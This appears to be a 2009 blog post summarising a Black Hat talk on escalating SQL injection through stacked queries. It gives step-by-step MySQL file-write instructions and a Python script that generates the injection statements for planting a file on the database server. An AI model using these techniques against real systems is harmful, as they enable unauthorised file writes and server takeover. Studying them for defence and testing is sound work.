Tuesday, April 21, 2009
Advanced SQL Injection, Black Hat
Bernardo Damele Assumpção Guimarães, an Italian researcher, presented at Black Hat Europe in Amsterdam last week some new techniques that can take an attacker from a SQL injection to full control of the target system.
One of these techniques uses batched (stacked) queries to read or write a malicious file on the database server's file system. The attack assumes that the database user holds specific privileges, which depend on the attack type (for example the FILE privilege on MySQL).
The attacks apply to several databases (MySQL, PostgreSQL and Microsoft SQL Server), to both Windows and Linux, and to the common web languages (PHP, ASP.NET and ASP). They rely on the web language/database combination supporting batched queries, so they do not apply as described where that support is missing, such as PHP with MySQL.
The details differ from one database to another, and some databases need additional workarounds to get around their restrictions.
The presenter is one of the developers of sqlmap, a tool that automates these techniques: it fingerprints the back-end DBMS first and then carries on the attack accordingly.
Here is how to write a file to the file system using MySQL:
- Create a support table with one field, data type longtext
- Encode the local file content to hex
- Split the hex-encoded string into chunks of 1024 characters each
- INSERT the first chunk into the table as a 0x... hex literal (MySQL stores the bytes it encodes, not the hex text)
- UPDATE the row with the remaining chunks, appending each one with CONCAT
- Export the table contents to the destination file path using SELECT's INTO DUMPFILE clause, which writes the value as raw bytes with no escaping or line terminators
- Retrieve the length of the written file with LENGTH(LOAD_FILE(...)) and compare it with the original size to check that it was written correctly
Two practical caveats: INTO DUMPFILE refuses to overwrite an existing file, and the mysqld process itself must be allowed to write to the destination directory (the secure_file_priv setting can restrict this to a single directory, or disable file operations entirely).
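The procedure above, as an added example that is not code from the original post or from sqlmap: a script that hex-encodes a file, chunks it, generates the batched MySQL statements in order, and interprets the result of the length check. The table and column names, the use of a LONGBLOB column instead of the longtext the talk mentions, and the LENGTH(LOAD_FILE(...)) form of the verification query are assumptions made here; the page only states that the written file's length is checked.

```python
"""Generate the batched MySQL statements that write a local file to the
target's file system via a support table and SELECT ... INTO DUMPFILE."""

import re
from typing import List, Optional

# The page splits the hex string into 1024-character chunks (512 bytes each);
# this keeps every injected statement short enough for a single request.
CHUNK_HEX_CHARS = 1024

# Hypothetical support-table and column names (the page names neither).
DEFAULT_TABLE = "tmp_fileswap"
DEFAULT_COLUMN = "data"


def hex_chunks(content: bytes, chunk_hex_chars: int = CHUNK_HEX_CHARS) -> List[str]:
    """Hex-encode the local file and split the encoding into fixed-size chunks."""
    if chunk_hex_chars < 2 or chunk_hex_chars % 2:
        # An odd split would cut a byte in half between two statements.
        raise ValueError("chunk size must be an even number of hex characters")
    hexstr = content.hex()
    return [hexstr[i:i + chunk_hex_chars] for i in range(0, len(hexstr), chunk_hex_chars)]


def sql_string(value: str) -> str:
    """Quote a path as a MySQL string literal; backslashes in Windows paths are doubled."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_write_statements(content: bytes, dest_path: str,
                           table: str = DEFAULT_TABLE, column: str = DEFAULT_COLUMN,
                           chunk_hex_chars: int = CHUNK_HEX_CHARS) -> List[str]:
    """Return the batched statements, in order, that recreate `content` at `dest_path`.

    Every chunk is sent as a 0x... hex literal, which MySQL stores as the raw bytes
    it encodes; INTO DUMPFILE then writes the column value out unescaped, so the
    file on disk is the original content, not its hex encoding.
    """
    if not content:
        raise ValueError("nothing to write")
    # LONGBLOB instead of the page's longtext (assumption): a BLOB column has the
    # binary charset, so arbitrary bytes are stored without character-set conversion.
    stmts = [f"CREATE TABLE {table}({column} LONGBLOB)"]
    for i, chunk in enumerate(hex_chunks(content, chunk_hex_chars)):
        if i == 0:
            stmts.append(f"INSERT INTO {table}({column}) VALUES (0x{chunk})")
        else:
            stmts.append(f"UPDATE {table} SET {column}=CONCAT({column},0x{chunk})")
    stmts.append(f"SELECT {column} FROM {table} INTO DUMPFILE {sql_string(dest_path)}")
    # Verification query: LENGTH(LOAD_FILE(path)) is NULL if the file was not written,
    # mysqld cannot read it back, or secure_file_priv forbids that location.
    stmts.append(f"SELECT LENGTH(LOAD_FILE({sql_string(dest_path)}))")
    return stmts


_HEX_LITERAL = re.compile(r"0x([0-9a-f]+)\)")


def reassemble(statements: List[str]) -> bytes:
    """Decode the hex literals back out of the INSERT/UPDATE statements.

    Running this locally before firing the batch confirms the chunking is lossless.
    """
    data = bytearray()
    for stmt in statements:
        if stmt.startswith(("INSERT INTO ", "UPDATE ")):
            data += bytes.fromhex(_HEX_LITERAL.search(stmt).group(1))
    return bytes(data)


def check_write(reported_length: Optional[int], content: bytes) -> bool:
    """Interpret the LENGTH(LOAD_FILE(...)) result: only an exact byte count
    means the whole file was written; NULL means it is missing or unreadable."""
    return reported_length is not None and reported_length == len(content)


if __name__ == "__main__":
    # Constructed sample payload: 768 bytes of binary data, so it spans two chunks.
    sample = bytes(range(256)) * 3
    statements = build_write_statements(sample, "/tmp/out.bin")
    for s in statements:
        print(s[:80] + ("..." if len(s) > 80 else ""))
    assert reassemble(statements) == sample
```

Each statement in the returned list is what would be appended, after the stacked-query separator, to the injectable parameter, one request per statement; the last one is the only one whose result needs to be read back, which is why its value is kept separate in check_write rather than inferred from an HTTP status.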